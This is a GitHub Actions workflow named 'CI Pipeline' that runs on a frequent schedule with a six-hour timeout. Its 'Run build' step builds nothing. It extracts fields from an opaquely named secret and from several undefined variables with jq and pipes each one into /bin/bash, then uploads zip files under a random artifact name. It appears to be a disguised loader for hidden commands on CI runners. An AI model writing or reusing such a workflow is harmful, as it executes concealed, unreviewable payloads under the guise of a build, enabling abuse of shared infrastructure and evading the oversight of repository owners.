name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '46 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          gzxa36900: ${{ secrets.gzxa36900 }}
        run: |
          printf '%s' "$gzxa36900" | jq -r .koy6 | /bin/bash
          echo $zi40108 | jq -r .mm7 | /bin/bash
          printf '%s' "$fq34" | jq -r .x857 | /bin/bash
          echo $ipq098 | jq -r .esc9869 | /bin/bash
          echo $po67 | jq -r .mo786 | /bin/bash
          echo $ayp924 | jq -r .zx9284 | /bin/bash
          echo $wzgks9 | jq -r .zbzis84828 | /bin/bash
          printf '%s' "$zihh2506" | jq -r .lqn793 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: iHBbhXbH
          path: "*.zip"
          retention-days: 1
